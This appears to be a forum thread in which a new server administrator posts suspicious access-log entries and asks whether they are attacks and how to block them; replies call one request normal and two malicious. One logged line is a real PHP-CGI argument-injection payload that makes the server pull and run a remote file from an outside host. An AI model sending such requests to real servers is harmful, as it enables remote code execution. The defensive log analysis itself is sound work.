Suspicious Traffic
I've discovered some suspicious traffic that I'd like to ask about:
A. 91.205.189.15 - - [17/Dec/2012:10:39:52 -0500] "GET /user/soapCaller.bs HTTP/1.1" 301 504 "-" "Morfeus Fucking Scanner"
B. 213.26.162.68 - - [17/Dec/2012:03:59:55 -0500] "GET /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://qualityhost.in/a.txt
C. 65.111.177.188 - - [18/Dec/2012:02:15:15 -0500] "GET / HTTP/1.1" 301 471 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
1. My main concern is why the B turned up in access.log rather than error.log? Does that means it was successful?
Based on what I read across the forum, this is an injection attack or checking for an open proxy, correct?
2. How can I check if something like this was successful?
3. With Fail2Ban installed, is there a way to craft a RegExp to block such future requests?
4. URL C, It doesn't look like it got anything, is this a normal request or something to protect against?
Thanks for any advice you may have.
4 Replies
For C, that looks like a completely normal web request. Somebody using Chrome tried to access your website. Why would you want to block it?
Yes, I do have index.php.
Well, I probably should have stated that I'm new to managing this aspect of a server, so I just wanted to check. You've definitely put me at ease though. In regards to C, I had figured that legitimate requests would have had more than '/' - something along the lines of B.
A and B are definitely malicious traffic, but if you keep up to date with security updates, you should be fine.